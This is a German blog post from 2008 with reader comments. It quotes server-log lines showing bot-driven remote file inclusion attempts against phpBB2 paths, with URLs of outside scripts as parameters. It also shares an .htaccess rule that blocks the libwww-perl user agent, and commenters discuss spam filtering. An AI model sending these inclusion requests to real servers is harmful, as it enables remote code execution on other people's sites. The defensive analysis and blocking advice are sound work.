In letzter Zeit häufen sich versucht Angriffe auf Simlau.net. Hier mal ein kleiner Auschnitt aus den Logs, die IPs wurden zensiert.
simon@linux-desktop:~$ grep libwww-perl access.log
[22/Jun/2008:01:03:36 +0200] “GET /*.php?page=h**p://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1″ 404 6769 “-” “libwww-perl/5.805″
[22/Jun/2008:11:21:59 +0200] “GET /pages/downloads/phpbb2.php/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.z3roadster.it/home/on.txt? HTTP/1.1″ 200 10489 “-” “libwww-perl/5.810″
[22/Jun/2008:11:22:00 +0200] “GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=h**p://www.z3roadster.it/home/on.txt? HTTP/1.1″ 404 6769 “-” “libwww-perl/5.810″
[22/Jun/2008:23:55:58 +0200] “GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=h**p://www.olympic.ca/EN/forms/hbc_bios/id.txt%0D?? HTTP/1.1″ 404 6769 “-” “libwww-perl/5.811″
Wie man sieht einfach wahllos versuchte Remote File Inclusions und Exploits. Telweise warscheinlich phpBB2 Explots, die aber auf die phpBB-Download Seite der Webseite von Simlau.net ausgeübt wurden. Hier läuft jedoch kein phpBB2, sondern Website Baker. Ich nehme an, dass die Bots wegen dem Slash, dass hinter der Seite beim aufrufen von veralteten Links noch hinzugefügt wird, die Seite für ein phpBB2-Forum halten.
Ich gehe also nicht davon aus, dass das von einem Menschen kommt. Ich weiß ja, dass manche Script Kiddys unheimlich dumm sind, aber so dumm? Nein..
Da sich das in letzter Zeit sehr anhäuft, wird seit heute der User-Agent “libwww-perl” komplett ausgesperrt. Das geht übrigens ganz einfach:
Einfach den folgenden Eintrag in seine .htaccess-Datei (sofern vorhanden, ansonsten einfach neu anlegen) einfügen.
# libwww-perl wird zu 99% nur für Exploits benutzt…
RewriteCond %{HTTP_USER_AGENT} ^.*libwww-perl.*$
RewriteRule ^.* - [F]
Passiert ist natürlich nichts, wie auch? 
Ja, diese Anfragen kenne ich zu Tausenden ebenfalls. Ich blockiere dann einfach immer die IP’s für einige Tage, denn sobald diese Bots merken, dass sie keinen Zugriff mehr haben, hören die Anfragen auch auf. Wirklich traurig, dass bald die Mehrheit der Anfragen von Bots ausgehen…
MfG Christian
Ich bin ja schon mal froh, dass ich keinen Spam im Gästebuch und in den Kommentaren mehr habe, das war auch ne ziemliche Tortur immer, diese ganzen Spamkommentare zu löschen.
Die IPs sperren wäre hier etwas umständlich. Es sind einfach zu viele verschiedene. Ich denke so ist es vorerst mal die beste Lösung.
Die Regel ‘RewriteRule ^.* - [F]‘ besagt ja, dass er ALLES matchen soll. Hier bedeutet ^.*, dass die URL mit KEINEN, EIN oder MEHREREN Zeichen beginnt.
Optimaler ist hier einfach ein Punkt (.), welcher einfach nur bedeutet, dass im String ein beliebiges Zeichen vorkommen muss:
RewriteRule . - [F]
Danke für das Feedback. Ich bin im Moment dabei mich in den Syntax von modrewrite einzuarbeiten und zur Zeit noch nicht so fit darin. Man lernt immer dazu.
Ich werde es später anpassen, bin im Moment nur noch kurz mit dem itouch online.
Wenn du’s eh einarbeitest, kannst du dir mal die Apache Direktive ‘Browsermatch’ [1] ansehen. Die wurde speziell dazu gemacht, Filter für Browser anzulegen und diese dann entweder per allow/deny zu filtern oder auch sonstige Anpassungen vorzunehen, um Apache auch an Fehler der üblichen Browser zu gewöhnen.
Das erlaubt die Filterung auch ohne mod_rewrite. Das schöne ist, dass man so mehrere Filter zu einer Gruppe zusammenfassen kann, die dann per deny gemeinsam abgewiesen oder per allow erlauben kann.
Ein Beispiel für Allow ist unter [2].
[1] http://httpd.apache.org/docs/2.0/mod/mod_setenvif.html
[2] http://nadeausoftware.com/articles/2007/05/stop_spammer_email_harvesters_blocking_spammer_access_site
Danke für die Links.
Ich werde sie mir auf jedenfall mal zu Gemüte führen.
Zum Glück habe ich mit Spambots etc. seit ewigkeiten keine Probleme mehr - zumindest nicht auf der Homepage (Gästebuch) und im Forum. Trotzdem ist es teilweise echt nervig, wenn man tausende emails am Tag mit Spam bekommt - dagegen habe ich bislang noch keine wirksame Lösung gefunden,obwohl mein Server eingehende emails mit diversen Blacklists etc. abgleicht; scheinbar sind diese Anbieter (z.B. http://www.spamhaus.org/) dem Ansturm auch nicht mehr gewachsen o_O..
@Christian: Jetzt weiss ich auch warum Du so wenig Zeit hast ^^ .. ist ja kein Wunder, wenn Du immer alle Bot-IP\’s auf ignore setzt
Greetz,
Steve
Spamhaus & Co haben das Problem, dass Server in Sekunden per Botnetz gehackt und für den Spamversand missbraucht werden. So hat ein Server schon mehrere Millionen Mails versendet, bis Spamhaus überhaupt von einem User eine Bestätigung für den Spammer erhält.
Sinnvoll ist hier Greylisting. Es wird zwar oft gesagt, dass die Spammer sich dem Greylisting langsam anpassen und die Mail nach 10 Minuten einfach nochmal senden, doch bis dahin hatten die Blacklists genug Zeit zu reagieren und haben den Spammer schon gesperrt.
Durch den Einsatz von Greylisting UND Blacklists schaffe ich es, aus 280 Zustellversuchen pro Stunde nur knapp 3,6 Mails pro Stunde durchzulassen - und bisher habe ich noch nie eine gewollte Mail verloren oder vermisst…
@Steve: Klar doch, ich sitze 24/7 online, nur um mit der IP Sperre nachzukommen *ironie*
MfG Christian
Bin auch Opfer - wohl derselben Bots
http://blog.raphaelmichel.de/beitrag/homepage/2008-11-09-mochtegernhacker/
Das mit mod_rewrite ist eine gute Idee.
Na klar … Du bist bestimmt ein Opfer des selben Botnetzes — es gibt ja auch ganz bestimmt nur ein einziges Botnetz im Internet…
(http://de.wikipedia.org/wiki/Kim_Schmitz))… dieser kleine Spacken hat damals die ein- oder andere BBS auffliegen lassen und hat einen sehr grossen Anteil daran gehabt, das das sog. Blueboxing nicht mehr reibungslos funktionierte..
Und jetzt komm mir bitte nicht mit dem Argument, das die Angriffe sich aehneln bzw. fast identisch sind… das hat in der heutigen Zeit nichts mehr zu bedeuten .. wenn zu Zeiten des Amiga (wo Du noch nicht einmal als Quark im Schaufenster gelegen hast :P) irgendwelche grossen und kleinen Problemchen damit hatte, das mal einige Mailbox-Systeme gehackt wurden, konnte man davon ausgehen, das es wohl ein- und der selbe Freak war, der hinter allem steckt (oftmals war es einfach Kim Schmitz alias Kimble - der typische Zivilversager, der sich auf diese Weise Gehör verschaffen wollte.. dafuer hat er auch mit Morddrohungen etc. leben muessen und hat seinen Eltern viel Kummer bereitet
Na ja.. solche Grossmaeuler gibt es ja in der heutigen Pubertierenden